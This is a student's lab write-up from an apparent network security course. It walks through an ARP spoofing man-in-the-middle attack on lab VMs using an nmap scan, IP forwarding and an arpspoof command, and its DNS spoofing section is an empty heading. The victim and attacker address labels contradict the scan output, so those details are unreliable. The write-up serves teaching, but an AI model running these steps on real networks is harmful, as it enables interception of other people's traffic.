A&D of Network Security - Lab 4(ARP & DNS SPOOFING)

A&D of Network Security - Lab 4(ARP & DNS SPOOFING)

tags: Practicum of A&D of NS NTU

Background

ARP Spoofing at 1:15:00

ARP SPOOFING

  1. Setting 2 VMs’ network interface as Bridged adapter :::danger You supposed to use your own network instead of public network :::
  2. Checking IP

    And check the victim gateway by nmap

     $ sudo nmap -sP 192.168.43.0/24
     Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-19 10:46 EDT
     Nmap scan report for DESKTOP-D0UCTM3 (192.168.43.56)
     Host is up (0.00020s latency).
     MAC Address: 68:54:5A:DC:03:57 (Intel Corporate)
     Nmap scan report for 192.168.43.66
     Host is up (0.010s latency).
     MAC Address: D4:38:9C:87:2F:C6 (Sony)
     Nmap scan report for kali (192.168.43.222)
     Host is up (0.00040s latency).
     MAC Address: 08:00:27:B1:9D:67 (Oracle VirtualBox virtual NIC)
     Nmap scan report for 192.168.43.78
     Host is up.
     Nmap done: 256 IP addresses (4 hosts up) scanned in 6.13 seconds
    

    :::info Victim VM $\to$ 192.168.43.222 / MAC $\to$ 08:00:27:F7:12:7A Attacker VM $\to$ 192.168.43.78 / MAC $\to$ 08:00:27:B1:9D:67 Default Gateway $\to$ 192.168.43.66 :::

  3. Open NAT Port Forwarding
    • In Attacker VM
       $ sudo su
       $ echo 1 > /proc/sys/net/ipv4/ip_forward
       $ exit
       $ cat /proc/sys/net/ipv4/ip_forward
       1
      
    • In Victim VM
      1
      2
      3
      4
       $ arp -a
       ? (192.168.43.78) at 08:00:27:f7:12:7a [ether] on eth0
       DESKTOP-D0UCTM3 (192.168.43.56) at 68:54:5a:dc:03:57 [ether] on eth0
       DESKTOP-D0UCTM3 (192.168.43.56) at 68:54:5a:dc:03:57 [ether] on eth0
      
  4. Start to attack
    1
    2
     $ sudo arpspoof -i eth0 -t 192.168.43.222 192.168.43.66
     // sudo arpspoof -i {網卡介面} -t {攻擊目標 IP} {Gateway IP}
    
  5. Result

Problem & Solved

:::info If you can not install dsniff, you may update and upgrade the whole system with command sudo apt-get update; sudo apt-get upgrade(It may take lot’s of time to finish the work) :::

DNS SPOOFING